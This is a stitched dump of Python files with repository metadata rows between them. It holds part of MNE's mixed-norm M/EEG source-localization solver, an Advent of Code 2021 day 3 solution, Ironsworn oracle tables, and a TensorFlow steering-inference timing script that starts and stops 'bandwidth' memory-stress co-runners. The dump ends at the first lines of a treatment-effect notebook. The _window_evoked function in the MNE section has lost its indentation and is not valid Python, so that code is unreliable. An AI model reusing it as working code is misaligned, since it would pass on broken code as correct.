    M is the measured (whitened) sensor data and M_est the modeled data;
    both are used to compute a per-timepoint goodness of fit.
    """
    times = tmin + tstep * np.arange(X.shape[1])

    if not active_is_idx:
        active_idx = np.where(active_set)[0]
    else:
        active_idx = active_set

    n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
    if n_dip_per_pos > 1:
        active_idx = np.unique(active_idx // n_dip_per_pos)

    # Goodness of fit (%) per time sample: 1 - ||residual||^2 / ||data||^2.
    gof = np.zeros(M_est.shape[1])
    M_norm2 = np.sum(M ** 2, axis=0)
    R_norm2 = np.sum((M - M_est) ** 2, axis=0)
    gof[M_norm2 > 0.0] = 1. - R_norm2[M_norm2 > 0.0] / M_norm2[M_norm2 > 0.0]
    gof *= 100.

    dipoles = []
    for k, i_dip in enumerate(active_idx):
        # Fixed position over time, replicated for every time sample.
        i_pos = forward['source_rr'][i_dip][np.newaxis, :]
        i_pos = i_pos.repeat(len(times), axis=0)
        X_ = X[k * n_dip_per_pos: (k + 1) * n_dip_per_pos]
        if n_dip_per_pos == 1:
            # Fixed orientation: amplitude is the single component.
            amplitude = X_[0]
            i_ori = forward['source_nn'][i_dip][np.newaxis, :]
            i_ori = i_ori.repeat(len(times), axis=0)
        else:
            # Free orientation: rotate back to head coords if needed, then
            # derive amplitude and unit orientation per time sample.
            if forward['surf_ori']:
                X_ = np.dot(forward['source_nn'][i_dip *
                            n_dip_per_pos:(i_dip + 1) * n_dip_per_pos].T, X_)

            amplitude = np.sqrt(np.sum(X_ ** 2, axis=0))
            i_ori = np.zeros((len(times), 3))
            i_ori[amplitude > 0.] = (X_[:, amplitude > 0.] /
                                     amplitude[amplitude > 0.]).T

        dipoles.append(Dipole(times, i_pos, amplitude, i_ori, gof))

    return dipoles
@verbose
def make_stc_from_dipoles(dipoles, src, verbose=None):
    """Convert a list of spatio-temporal dipoles into a SourceEstimate.

    Parameters
    ----------
    dipoles : Dipole | list of instances of Dipole
        The dipoles to convert.
    src : instance of SourceSpaces
        The source space used to generate the forward operator.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see :func:`mne.verbose`
        and :ref:`Logging documentation <tut_logging>` for more).

    Returns
    -------
    stc : SourceEstimate
        The source estimate.
    """
    logger.info('Converting dipoles into a SourceEstimate.')
    if isinstance(dipoles, Dipole):
        dipoles = [dipoles]
    if not isinstance(dipoles, list):
        raise ValueError('Dipoles must be an instance of Dipole or '
                         'a list of instances of Dipole. '
                         'Got %s!' % type(dipoles))
    tmin = dipoles[0].times[0]
    tstep = dipoles[0].times[1] - tmin
    X = np.zeros((len(dipoles), len(dipoles[0].times)))
    # Positions of all source-space vertices, lh then rh.
    source_rr = np.concatenate([_src['rr'][_src['vertno'], :] for _src in src],
                               axis=0)
    n_lh_points = len(src[0]['vertno'])
    lh_vertno = list()
    rh_vertno = list()
    for i in range(len(dipoles)):
        if not np.all(dipoles[i].pos == dipoles[i].pos[0]):
            raise ValueError('Only dipoles with fixed position over time '
                             'are supported!')
        X[i] = dipoles[i].amplitude
        # Match the dipole position to a source-space vertex and assign it
        # to the corresponding hemisphere.
        idx = np.all(source_rr == dipoles[i].pos[0], axis=1)
        idx = np.where(idx)[0][0]
        if idx < n_lh_points:
            lh_vertno.append(src[0]['vertno'][idx])
        else:
            rh_vertno.append(src[1]['vertno'][idx - n_lh_points])
    vertices = [np.array(lh_vertno).astype(int),
                np.array(rh_vertno).astype(int)]
    stc = SourceEstimate(X, vertices=vertices, tmin=tmin, tstep=tstep,
                         subject=src[0]['subject_his_id'])
    logger.info('[done]')
    return stc
@verbose
def mixed_norm(evoked, forward, noise_cov, alpha, loose='auto', depth=0.8,
               maxit=3000, tol=1e-4, active_set_size=10, pca=True,
               debias=True, time_pca=True, weights=None, weights_min=None,
               solver='auto', n_mxne_iter=1, return_residual=False,
               return_as_dipoles=False, dgap_freq=10, verbose=None):
    """Mixed-norm estimate (MxNE) and iterative reweighted MxNE (irMxNE).

    Compute L1/L2 mixed-norm solution [1]_ or L0.5/L2 [2]_ mixed-norm
    solution on evoked data.

    Parameters
    ----------
    evoked : instance of Evoked or list of instances of Evoked
        Evoked data to invert.
    forward : dict
        Forward operator.
    noise_cov : instance of Covariance
        Noise covariance to compute whitener.
    alpha : float in range [0, 100)
        Regularization parameter. 0 means no regularization, 100 would give 0
        active dipole.
    loose : float in [0, 1] | 'auto'
        Value that weights the source variances of the dipole components
        that are parallel (tangential) to the cortical surface. If loose
        is 0 then the solution is computed with fixed orientation.
        If loose is 1, it corresponds to free orientations.
        The default value ('auto') is set to 0.2 for surface-oriented source
        space and set to 1.0 for volumic or discrete source space.
    depth: None | float in [0, 1]
        Depth weighting coefficients. If None, no depth weighting is performed.
    maxit : int
        Maximum number of iterations.
    tol : float
        Tolerance parameter.
    active_set_size : int | None
        Size of active set increment. If None, no active set strategy is used.
    pca : bool
        If True the rank of the data is reduced to true dimension.
    debias : bool
        Remove coefficient amplitude bias due to L1 penalty.
    time_pca : bool or int
        If True the rank of the concatenated epochs is reduced to
        its true dimension. If is 'int' the rank is limited to this value.
    weights : None | array | SourceEstimate
        Weight for penalty in mixed_norm. Can be None, a
        1d array with shape (n_sources,), or a SourceEstimate (e.g. obtained
        with wMNE, dSPM, or fMRI).
    weights_min : float
        Do not consider in the estimation sources for which weights
        is less than weights_min.
    solver : 'prox' | 'cd' | 'bcd' | 'auto'
        The algorithm to use for the optimization. 'prox' stands for
        proximal iterations using the FISTA algorithm, 'cd' uses
        coordinate descent, and 'bcd' applies block coordinate descent.
        'cd' is only available for fixed orientation.
    n_mxne_iter : int
        The number of MxNE iterations. If > 1, iterative reweighting
        is applied.
    return_residual : bool
        If True, the residual is returned as an Evoked instance.
    return_as_dipoles : bool
        If True, the sources are returned as a list of Dipole instances.
    dgap_freq : int or np.inf
        The duality gap is evaluated every dgap_freq iterations. Ignored if
        solver is 'cd'.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see :func:`mne.verbose`
        and :ref:`Logging documentation <tut_logging>` for more).

    Returns
    -------
    stc : SourceEstimate | list of SourceEstimate
        Source time courses for each evoked data passed as input.
    residual : instance of Evoked
        The residual a.k.a. data not explained by the sources.
        Only returned if return_residual is True.

    See Also
    --------
    tf_mixed_norm

    References
    ----------
    .. [1] A. Gramfort, M. Kowalski, M. Hamalainen,
       "Mixed-norm estimates for the M/EEG inverse problem using accelerated
       gradient methods", Physics in Medicine and Biology, 2012.
       https://doi.org/10.1088/0031-9155/57/7/1937

    .. [2] D. Strohmeier, Y. Bekhti, J. Haueisen, A. Gramfort,
       "The Iterative Reweighted Mixed-Norm Estimate for Spatio-Temporal
       MEG/EEG Source Reconstruction", IEEE Transactions of Medical Imaging,
       Volume 35 (10), pp. 2218-2228, 2016.
    """
    if not (0. <= alpha < 100.):
        raise ValueError('alpha must be in [0, 100). '
                         'Got alpha = %s' % alpha)
    if n_mxne_iter < 1:
        raise ValueError('MxNE has to be computed at least 1 time. '
                         'Requires n_mxne_iter >= 1, got %d' % n_mxne_iter)
    if dgap_freq <= 0.:
        raise ValueError('dgap_freq must be a positive integer.'
                         ' Got dgap_freq = %s' % dgap_freq)

    if not isinstance(evoked, list):
        evoked = [evoked]

    _check_reference(evoked[0])

    all_ch_names = evoked[0].ch_names
    if not all(all_ch_names == evoked[i].ch_names
               for i in range(1, len(evoked))):
        raise Exception('All the datasets must have the same good channels.')

    loose, forward = _check_loose_forward(loose, forward)

    # put the forward solution in fixed orientation if it's not already
    if loose == 0. and not is_fixed_orient(forward):
        forward = convert_forward_solution(
            forward, surf_ori=True, force_fixed=True, copy=True, use_cps=True)

    gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
        forward, evoked[0].info, noise_cov, pca, depth, loose, weights,
        weights_min)

    sel = [all_ch_names.index(name) for name in gain_info['ch_names']]
    M = np.concatenate([e.data[sel] for e in evoked], axis=1)

    # Whiten data
    logger.info('Whitening data matrix.')
    M = np.dot(whitener, M)

    if time_pca:
        # Reduce (or cap) the temporal dimension via SVD; projected back
        # with Vh after solving.
        U, s, Vh = linalg.svd(M, full_matrices=False)
        if not isinstance(time_pca, bool) and isinstance(time_pca, int):
            U = U[:, :time_pca]
            s = s[:time_pca]
            Vh = Vh[:time_pca]
        M = U * s

    # Scaling to make setting of alpha easy
    n_dip_per_pos = 1 if is_fixed_orient(forward) else 3
    alpha_max = norm_l2inf(np.dot(gain.T, M), n_dip_per_pos, copy=False)
    alpha_max *= 0.01
    gain /= alpha_max
    source_weighting /= alpha_max

    if n_mxne_iter == 1:
        X, active_set, E = mixed_norm_solver(
            M, gain, alpha, maxit=maxit, tol=tol,
            active_set_size=active_set_size, n_orient=n_dip_per_pos,
            debias=debias, solver=solver, dgap_freq=dgap_freq, verbose=verbose)
    else:
        X, active_set, E = iterative_mixed_norm_solver(
            M, gain, alpha, n_mxne_iter, maxit=maxit, tol=tol,
            n_orient=n_dip_per_pos, active_set_size=active_set_size,
            debias=debias, solver=solver, dgap_freq=dgap_freq, verbose=verbose)

    if time_pca:
        # Project solution and data back to the original time basis.
        X = np.dot(X, Vh)
        M = np.dot(M, Vh)

    # Compute estimated whitened sensor data
    M_estimated = np.dot(gain[:, active_set], X)

    if mask is not None:
        # Map the active set back to the full (un-pruned) source space.
        # BUGFIX: use builtin bool -- the np.bool alias was removed in
        # NumPy >= 1.24.
        active_set_tmp = np.zeros(len(mask), dtype=bool)
        active_set_tmp[mask] = active_set
        active_set = active_set_tmp
        del active_set_tmp

    if active_set.sum() == 0:
        raise Exception("No active dipoles found. alpha is too big.")

    # Reapply weights to have correct unit
    X = _reapply_source_weighting(X, source_weighting, active_set)

    outs = list()
    residual = list()
    cnt = 0
    for e in evoked:
        tmin = e.times[0]
        tstep = 1.0 / e.info['sfreq']
        Xe = X[:, cnt:(cnt + len(e.times))]
        if return_as_dipoles:
            out = _make_dipoles_sparse(
                Xe, active_set, forward, tmin, tstep,
                M[:, cnt:(cnt + len(e.times))],
                M_estimated[:, cnt:(cnt + len(e.times))], verbose=None)
        else:
            out = _make_sparse_stc(Xe, active_set, forward, tmin, tstep)
        outs.append(out)
        cnt += len(e.times)

        if return_residual:
            residual.append(_compute_residual(forward, e, Xe, active_set,
                                              gain_info))

    logger.info('[done]')

    if len(outs) == 1:
        out = outs[0]
        if return_residual:
            residual = residual[0]
    else:
        out = outs

    if return_residual:
        out = out, residual

    return out
def _window_evoked(evoked, size):
"""Window evoked (size in seconds)."""
if isinstance(size, (float, int)):
lsize = rsize = float(size)
else:
lsize, rsize = size
evoked = evoked.copy()
sfreq = float(evoked.info['sfreq'])
lsize = int(lsize * sfreq)
rsize = int(rsize * sfreq)
lhann = signal.hann(lsize * 2)
rhann = signal.hann(rsize * 2)
window = np.r_[lhann[:lsize],
np.ones(len(evoked.times) - lsize - rsize),
rhann[-rsize:]]
evoked.data *= window[None, :]
return evoked
@verbose
def tf_mixed_norm(evoked, forward, noise_cov,
                  loose='auto', depth=0.8, maxit=3000,
                  tol=1e-4, weights=None, weights_min=None, pca=True,
                  debias=True, wsize=64, tstep=4, window=0.02,
                  return_residual=False, return_as_dipoles=False,
                  alpha=None, l1_ratio=None, dgap_freq=10, verbose=None):
    """Time-Frequency Mixed-norm estimate (TF-MxNE).

    Compute L1/L2 + L1 mixed-norm solution on time-frequency
    dictionary. Works with evoked data [1]_ [2]_.

    Parameters
    ----------
    evoked : instance of Evoked
        Evoked data to invert.
    forward : dict
        Forward operator.
    noise_cov : instance of Covariance
        Noise covariance to compute whitener.
    loose : float in [0, 1] | 'auto'
        Value that weights the source variances of the dipole components
        that are parallel (tangential) to the cortical surface. If loose
        is 0 then the solution is computed with fixed orientation.
        If loose is 1, it corresponds to free orientations.
        The default value ('auto') is set to 0.2 for surface-oriented source
        space and set to 1.0 for volumic or discrete source space.
    depth: None | float in [0, 1]
        Depth weighting coefficients. If None, no depth weighting is performed.
    maxit : int
        Maximum number of iterations.
    tol : float
        Tolerance parameter.
    weights: None | array | SourceEstimate
        Weight for penalty in mixed_norm. Can be None or
        1d array of length n_sources or a SourceEstimate e.g. obtained
        with wMNE or dSPM or fMRI.
    weights_min: float
        Do not consider in the estimation sources for which weights
        is less than weights_min.
    pca: bool
        If True the rank of the data is reduced to true dimension.
    debias: bool
        Remove coefficient amplitude bias due to L1 penalty.
    wsize: int or array-like
        Length of the STFT window in samples (must be a multiple of 4).
        If an array is passed, multiple TF dictionaries are used (each having
        its own wsize and tstep) and each entry of wsize must be a multiple
        of 4. See [3]_.
    tstep: int or array-like
        Step between successive windows in samples (must be a multiple of 2,
        a divider of wsize and smaller than wsize/2) (default: wsize/2).
        If an array is passed, multiple TF dictionaries are used (each having
        its own wsize and tstep), and each entry of tstep must be a multiple
        of 2 and divide the corresponding entry of wsize. See [3]_.
    window : float or (float, float)
        Length of time window used to take care of edge artifacts in seconds.
        It can be one float or float if the values are different for left
        and right window length.
    return_residual : bool
        If True, the residual is returned as an Evoked instance.
    return_as_dipoles : bool
        If True, the sources are returned as a list of Dipole instances.
    alpha : float in [0, 100) or None
        Overall regularization parameter.
        If alpha and l1_ratio are not None, alpha_space and alpha_time are
        overridden by alpha * alpha_max * (1. - l1_ratio) and alpha * alpha_max
        * l1_ratio. 0 means no regularization, 100 would give 0 active dipole.
    l1_ratio : float in [0, 1] or None
        Proportion of temporal regularization.
        If l1_ratio and alpha are not None, alpha_space and alpha_time are
        overridden by alpha * alpha_max * (1. - l1_ratio) and alpha * alpha_max
        * l1_ratio. 0 means no time regularization aka MxNE.
    dgap_freq : int or np.inf
        The duality gap is evaluated every dgap_freq iterations.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see :func:`mne.verbose`
        and :ref:`Logging documentation <tut_logging>` for more).

    Returns
    -------
    stc : instance of SourceEstimate
        Source time courses.
    residual : instance of Evoked
        The residual a.k.a. data not explained by the sources.
        Only returned if return_residual is True.

    See Also
    --------
    mixed_norm

    References
    ----------
    .. [1] A. Gramfort, D. Strohmeier, J. Haueisen, M. Hamalainen, M. Kowalski
       "Time-Frequency Mixed-Norm Estimates: Sparse M/EEG imaging with
       non-stationary source activations",
       Neuroimage, Volume 70, pp. 410-422, 15 April 2013.
       DOI: 10.1016/j.neuroimage.2012.12.051

    .. [2] A. Gramfort, D. Strohmeier, J. Haueisen, M. Hamalainen, M. Kowalski
       "Functional Brain Imaging with M/EEG Using Structured Sparsity in
       Time-Frequency Dictionaries",
       Proceedings Information Processing in Medical Imaging
       Lecture Notes in Computer Science, Volume 6801/2011, pp. 600-611, 2011.
       DOI: 10.1007/978-3-642-22092-0_49

    .. [3] Y. Bekhti, D. Strohmeier, M. Jas, R. Badeau, A. Gramfort.
       "M/EEG source localization with multiscale time-frequency dictionaries",
       6th International Workshop on Pattern Recognition in Neuroimaging
       (PRNI), 2016.
       DOI: 10.1109/PRNI.2016.7552337
    """
    _check_reference(evoked)

    all_ch_names = evoked.ch_names
    info = evoked.info

    # BUG FIX: with the default alpha=None / l1_ratio=None the chained
    # comparisons below raised an uninformative TypeError; guard None
    # explicitly so callers get the documented ValueError instead.
    if alpha is None or not (0. <= alpha < 100.):
        raise ValueError('alpha must be in [0, 100). '
                         'Got alpha = %s' % alpha)
    if l1_ratio is None or not (0. <= l1_ratio <= 1.):
        raise ValueError('l1_ratio must be in range [0, 1].'
                         ' Got l1_ratio = %s' % l1_ratio)
    # Split the overall regularization between the spatial and temporal terms.
    alpha_space = alpha * (1. - l1_ratio)
    alpha_time = alpha * l1_ratio

    if dgap_freq <= 0.:
        raise ValueError('dgap_freq must be a positive integer.'
                         ' Got dgap_freq = %s' % dgap_freq)

    tstep = np.atleast_1d(tstep)
    wsize = np.atleast_1d(wsize)
    if len(tstep) != len(wsize):
        raise ValueError('The same number of window sizes and steps must be '
                         'passed. Got tstep = %s and wsize = %s' %
                         (tstep, wsize))

    loose, forward = _check_loose_forward(loose, forward)

    # put the forward solution in fixed orientation if it's not already
    if loose == 0. and not is_fixed_orient(forward):
        forward = convert_forward_solution(
            forward, surf_ori=True, force_fixed=True, copy=True, use_cps=True)

    n_dip_per_pos = 1 if is_fixed_orient(forward) else 3

    gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
        forward, evoked.info, noise_cov, pca, depth, loose, weights,
        weights_min)

    # Taper the edges of the evoked data to limit STFT edge artifacts.
    if window is not None:
        evoked = _window_evoked(evoked, window)

    sel = [all_ch_names.index(name) for name in gain_info["ch_names"]]
    M = evoked.data[sel]

    # Whiten data
    logger.info('Whitening data matrix.')
    M = np.dot(whitener, M)

    # Scaling to make setting of alpha easy
    n_steps = np.ceil(M.shape[1] / tstep.astype(float)).astype(int)
    n_freqs = wsize // 2 + 1
    n_coefs = n_steps * n_freqs
    phi = _Phi(wsize, tstep, n_coefs)

    # alpha is expressed as a percentage of alpha_max (the smallest value
    # that zeroes out every source), hence the 0.01 factor.
    alpha_max = norm_epsilon_inf(gain, M, phi, l1_ratio, n_dip_per_pos)
    alpha_max *= 0.01
    gain /= alpha_max
    source_weighting /= alpha_max

    X, active_set, E = tf_mixed_norm_solver(
        M, gain, alpha_space, alpha_time, wsize=wsize, tstep=tstep,
        maxit=maxit, tol=tol, verbose=verbose, n_orient=n_dip_per_pos,
        dgap_freq=dgap_freq, debias=debias)

    if active_set.sum() == 0:
        raise Exception("No active dipoles found. "
                        "alpha_space/alpha_time are too big.")

    # Compute estimated whitened sensor data
    M_estimated = np.dot(gain[:, active_set], X)

    if mask is not None:
        # Expand the active set back to the full (unmasked) source space.
        # BUG FIX: np.bool was deprecated and removed in NumPy >= 1.24;
        # the builtin bool is the documented replacement.
        active_set_tmp = np.zeros(len(mask), dtype=bool)
        active_set_tmp[mask] = active_set
        active_set = active_set_tmp
        del active_set_tmp

    # Reapply weights to have correct unit
    X = _reapply_source_weighting(X, source_weighting, active_set)

    if return_residual:
        residual = _compute_residual(
            forward, evoked, X, active_set, gain_info)

    if return_as_dipoles:
        out = _make_dipoles_sparse(
            X, active_set, forward, evoked.times[0], 1.0 / info['sfreq'],
            M, M_estimated, verbose=None)
    else:
        out = _make_sparse_stc(
            X, active_set, forward, evoked.times[0], 1.0 / info['sfreq'])

    logger.info('[done]')

    if return_residual:
        out = out, residual

    return out
| 38.008287
| 79
| 0.624355
|
4a15af0eb505ce4156da96a41ae624249becec94
| 1,299
|
py
|
Python
|
2021/day3.py
|
kdassharma/AdventOfCode
|
b11f4b481e9f24be9957faac415dcd4d04d93cba
|
[
"Apache-2.0"
] | 2
|
2020-12-02T06:01:37.000Z
|
2020-12-04T16:56:31.000Z
|
2021/day3.py
|
kdassharma/AdventOfCode2020
|
b11f4b481e9f24be9957faac415dcd4d04d93cba
|
[
"Apache-2.0"
] | null | null | null |
2021/day3.py
|
kdassharma/AdventOfCode2020
|
b11f4b481e9f24be9957faac415dcd4d04d93cba
|
[
"Apache-2.0"
] | null | null | null |
def findCommon(sequence):
    """Return the dominant bit of a binary string.

    Returns "1" when ones are the strict majority, "0" when zeros are,
    and "-1" on an exact tie (including the empty string).
    """
    ones = sequence.count("1")
    half = len(sequence) / 2
    if ones > half:
        return "1"
    if ones == half:
        return "-1"
    return "0"
# Part 1
# FIX: use a context manager so the input file is always closed (the
# original left the handle open), and size the bit columns from the first
# line instead of hard-coding a 12-bit width.
with open('data/day3.txt') as data:
    bits = []
    for line in data:
        stripped = line.strip()
        if not bits:
            bits = [''] * len(stripped)
        for i in range(len(stripped)):
            bits[i] += stripped[i]
# gamma collects the most common bit of each column.
gamma = ""
for sequence in bits:
    gamma += findCommon(sequence)
# epsilon is gamma's bitwise complement within the same bit width
# (variable name 'epilson' kept as-is for backward compatibility).
mask = 2**len(gamma) - 1
gamma_dec = int(gamma, 2)
epilson = ~gamma_dec & mask
print(gamma_dec*epilson)
# Part 2
from collections import Counter

# FIX: close the input file via a context manager.
with open('data/day3.txt') as data:
    nums = [line.strip() for line in data]
nums2 = nums.copy()
theta = ''
epsilon = ''
# Oxygen generator rating: keep numbers whose bit in the current position
# matches the MOST common bit (ties keep '1'), stopping once a single
# candidate remains.
for i in range(len(nums[0])):
    if len(nums) == 1:
        break
    common = Counter([x[i] for x in nums])
    if common['0'] > common['1']:
        nums = [x for x in nums if x[i] == '0']
    else:
        nums = [x for x in nums if x[i] == '1']
theta = nums[0]
# CO2 scrubber rating: keep numbers matching the LEAST common bit (ties
# keep '0'). BUG FIX: the original kept filtering after one candidate
# remained, which can empty the list entirely (a lone survivor with bit
# '0' gets removed) -- break as soon as one candidate is left.
for i in range(len(nums2[0])):
    if len(nums2) == 1:
        break
    common = Counter([x[i] for x in nums2])
    if common['0'] > common['1']:
        nums2 = [x for x in nums2 if x[i] == '1']
    else:
        nums2 = [x for x in nums2 if x[i] == '0']
if nums2:
    epsilon = nums2[0]
print(int(theta,2)*int(epsilon,2))
| 22.016949
| 43
| 0.576597
|
4a15b042d0bd457c5c81c42c20ed297f7267fa8c
| 3,057
|
py
|
Python
|
ironsworn/oracles.py
|
daniel-duliga/trpg-journal
|
6f7d68fafe60c0f053d1435d1894a3b3430eaf30
|
[
"MIT"
] | null | null | null |
ironsworn/oracles.py
|
daniel-duliga/trpg-journal
|
6f7d68fafe60c0f053d1435d1894a3b3430eaf30
|
[
"MIT"
] | null | null | null |
ironsworn/oracles.py
|
daniel-duliga/trpg-journal
|
6f7d68fafe60c0f053d1435d1894a3b3430eaf30
|
[
"MIT"
] | null | null | null |
from typing import List
from core import random_tables;
def _roll(oracle: List[str]):
    """Draw a random entry from *oracle* and print it."""
    entry = random_tables.roll_table(oracle)
    print(entry)
def action():
    """Roll on the Ironsworn "Action" oracle table and print the result."""
    entries = [
        'Scheme', 'Clash', 'Weaken', 'Initiate', 'Create', 'Swear',
        'Avenge', 'Guard', 'Defeat', 'Control', 'Break', 'Risk',
        'Surrender', 'Inspect', 'Raid', 'Evade', 'Assault', 'Deflect',
        'Threaten', 'Attack', 'Leave', 'Preserve', 'Manipulate', 'Remove',
        'Eliminate', 'Withdraw', 'Abandon', 'Investigate', 'Hold', 'Focus',
        'Uncover', 'Breach', 'Aid', 'Uphold', 'Falter', 'Suppress',
        'Hunt', 'Share', 'Destroy', 'Avoid', 'Reject', 'Demand',
        'Explore', 'Bolster', 'Seize', 'Mourn', 'Reveal', 'Gather',
        'Defy', 'Transform', 'Persevere', 'Serve', 'Begin', 'Move',
        'Coordinate', 'Resist', 'Await', 'Impress', 'Take', 'Oppose',
        'Capture', 'Overwhelm', 'Challenge', 'Acquire', 'Protect', 'Finish',
        'Strengthen', 'Restore', 'Advance', 'Command', 'Refuse', 'Find',
        'Deliver', 'Hide', 'Fortify', 'Betray', 'Secure', 'Arrive',
        'Affect', 'Change', 'Defend', 'Debate', 'Support', 'Follow',
        'Construct', 'Locate', 'Endure', 'Release', 'Lose', 'Reduce',
        'Escalate', 'Distract', 'Journey', 'Escort', 'Learn', 'Communicate',
        'Depart', 'Search', 'Charge', 'Summon',
    ]
    _roll(entries)
def theme():
    """Roll on the Ironsworn "Theme" oracle table and print the result."""
    entries = [
        'Risk', 'Ability', 'Price', 'Ally', 'Battle', 'Safety',
        'Survival', 'Weapon', 'Wound', 'Shelter', 'Leader', 'Fear',
        'Time', 'Duty', 'Secret', 'Innocence', 'Renown', 'Direction',
        'Death', 'Honor', 'Labor', 'Solution', 'Tool', 'Balance',
        'Love', 'Barrier', 'Creation', 'Decay', 'Trade', 'Bond',
        'Hope', 'Superstition', 'Peace', 'Deception', 'History', 'World',
        'Vow', 'Protection', 'Nature', 'Opinion', 'Burden', 'Vengeance',
        'Opportunity', 'Faction', 'Danger', 'Corruption', 'Freedom', 'Debt',
        'Hate', 'Possession', 'Stranger', 'Passage', 'Land', 'Creature',
        'Disease', 'Advantage', 'Blood', 'Language', 'Rumor', 'Weakness',
        'Greed', 'Family', 'Resource', 'Structure', 'Dream', 'Community',
        'War', 'Portent', 'Prize', 'Destiny', 'Momentum', 'Power',
        'Memory', 'Ruin', 'Mysticism', 'Rival', 'Problem', 'Idea',
        'Revenge', 'Health', 'Fellowship', 'Enemy', 'Religion', 'Spirit',
        'Fame', 'Desolation', 'Strength', 'Knowledge', 'Truth', 'Quest',
        'Pride', 'Loss', 'Law', 'Path', 'Warning', 'Relationship',
        'Wealth', 'Home', 'Strategy', 'Supply',
    ]
    _roll(entries)
| 14.488152
| 43
| 0.460255
|
4a15b06b96d7841b3d18e85c256a84287684842b
| 3,928
|
py
|
Python
|
LAN2018Oct24/LANcar/test-model.py
|
lotusxai/LAN-Workshops
|
e795e87021642bb54cf5328d3589d438ccad266b
|
[
"MIT"
] | 1
|
2019-05-02T22:11:59.000Z
|
2019-05-02T22:11:59.000Z
|
LAN2018Oct24/LANcar/test-model.py
|
lotusxai/Hands-on-ML-Workshops
|
e795e87021642bb54cf5328d3589d438ccad266b
|
[
"MIT"
] | 2
|
2019-03-18T15:28:55.000Z
|
2019-03-18T15:29:24.000Z
|
LAN2018Oct24/LANcar/test-model.py
|
lotusxai/Hands-on-ML-Workshops
|
e795e87021642bb54cf5328d3589d438ccad266b
|
[
"MIT"
] | 1
|
2019-02-12T20:49:14.000Z
|
2019-02-12T20:49:14.000Z
|
#!/usr/bin/env python
from __future__ import division
import tensorflow as tf
import params
model = __import__(params.model)
import cv2
import subprocess as sp
import itertools
import sys
import os
import preprocess
import time
import math
import numpy as np
import local_common as cm
def deg2rad(deg):
    """Convert an angle from degrees to radians."""
    scaled = deg * math.pi
    return scaled / 180.0
def rad2deg(rad):
    """Convert an angle from radians to degrees."""
    scaled = 180.0 * rad
    return scaled / math.pi
# NOTE: this script is Python 2 (print statements, xrange).
#Get and set the number of cores to be used by TensorFlow
NCPU=int(sys.argv[1])
config = tf.ConfigProto(intra_op_parallelism_threads=NCPU, inter_op_parallelism_threads=NCPU, \
        allow_soft_placement=True, device_count = {'CPU': 1})
#The max number of frames to be processed, and the number of frames already processed
NFRAMES = 1000
curFrame = 0
#Load the model
sess = tf.InteractiveSession(config=config)
saver = tf.train.Saver()
model_load_path = cm.jn(params.save_dir, params.model_load_file)
saver.restore(sess, model_load_path)
#List the epochs to be used for testing
epoch_ids = sorted(list(set(itertools.chain(*params.epochs.values()))))
# NOTE(review): the line below overrides the computed epoch list so only
# epoch 6 is processed (twice) -- confirm this is intentional.
epoch_ids = [6,6]
#Create lists for tracking operation timings
cap_time_list = []
prep_time_list = []
pred_time_list = []
tot_time_list = []
#Initialize the desired number of bandwidth co-runners with the given access type
# (argv[2] = number of co-runners, argv[3] = memory access type).
numCR = int(sys.argv[2]) + 1
if numCR > 1:
    numCR2 = numCR - 1
    access = sys.argv[3]
    accessCap = access.capitalize()
    folderName = "+{}{}CR".format(numCR2, accessCap)
    os.system('mkdir datafiles/{}CR/{}'.format(accessCap, folderName))
    # Launch the stressor processes in the background; they are interrupted
    # with SIGINT after inference completes.
    for i in range(1,numCR):
        os.system('bandwidth -a {} -m 16384 -t 10000 -c {} &'.format(access,i))
#Process all epochs
for epoch_id in epoch_ids:
    print '---------- processing video for epoch {} ----------'.format(epoch_id)
    #Get the number of frames in the epoch
    vid_path = cm.jn(params.data_dir, 'out-video-{}.avi'.format(epoch_id))
    assert os.path.isfile(vid_path)
    frame_count = cm.frame_count(vid_path)
    cap = cv2.VideoCapture(vid_path)
    machine_steering = []
    #Process the current epoch while recording the operation execution times
    print 'performing inference...'
    time_start = time.time()
    for frame_id in xrange(frame_count):
        # Only do work while the global frame budget (NFRAMES) lasts.
        if curFrame < NFRAMES:
            cam_start = time.time()
            ret, img = cap.read()
            assert ret
            prep_start = time.time()
            img = preprocess.preprocess(img)
            pred_start = time.time()
            rad = model.y.eval(feed_dict={model.x: [img]})[0][0]
            deg = rad2deg(rad)
            pred_end = time.time()
            # Per-stage latencies in milliseconds.
            cam_time = (prep_start - cam_start)*1000
            prep_time = (pred_start - prep_start)*1000
            pred_time = (pred_end - pred_start)*1000
            tot_time = (pred_end - cam_start)*1000
            print 'pred: {:0.2f} deg. took: {:0.2f} ms | cam={:0.2f} prep={:0.2f} pred={:0.2f}'.format(deg, tot_time, cam_time, prep_time, pred_time)
            # Skip the first frame's timing (warm-up cost).
            if frame_id > 0:
                tot_time_list.append(tot_time)
            machine_steering.append(deg)
            curFrame += 1
    cap.release()
    fps = frame_count / (time.time() - time_start)
    print 'completed inference, total frames: {}, average fps: {} Hz'.format(frame_count, round(fps, 1))
#Interrupt all bandwidth co-runners
if numCR > 1:
    os.system('killall -SIGINT bandwidth')
#Calculate and display statistics of the total inferencing times
print "count:", len(tot_time_list)
print "mean:", np.mean(tot_time_list)
print "max:", np.max(tot_time_list)
print "99.999pct:", np.percentile(tot_time_list, 99.999)
print "99.99pct:", np.percentile(tot_time_list, 99.99)
print "99.9pct:", np.percentile(tot_time_list, 99.9)
print "99pct:", np.percentile(tot_time_list, 99)
print "min:", np.min(tot_time_list)
print "median:", np.median(tot_time_list)
print "stdev:", np.std(tot_time_list)
| 31.934959
| 149
| 0.666242
|
4a15b0af19ec014b78e5a489484856f04dbcfa2d
| 74,409
|
py
|
Python
|
Estimating effect of drug combination on colon_cancer treatment.py
|
khanmustuffa11/AI-for-Medical-Treatment
|
03b9c5f84ea3b7ae4368f97770edc71f7d301b10
|
[
"MIT"
] | null | null | null |
Estimating effect of drug combination on colon_cancer treatment.py
|
khanmustuffa11/AI-for-Medical-Treatment
|
03b9c5f84ea3b7ae4368f97770edc71f7d301b10
|
[
"MIT"
] | null | null | null |
Estimating effect of drug combination on colon_cancer treatment.py
|
khanmustuffa11/AI-for-Medical-Treatment
|
03b9c5f84ea3b7ae4368f97770edc71f7d301b10
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# # Estimating Treatment Effect Using Machine Learning
# Welcome to the first assignment of **AI for Medical Treatment**!
#
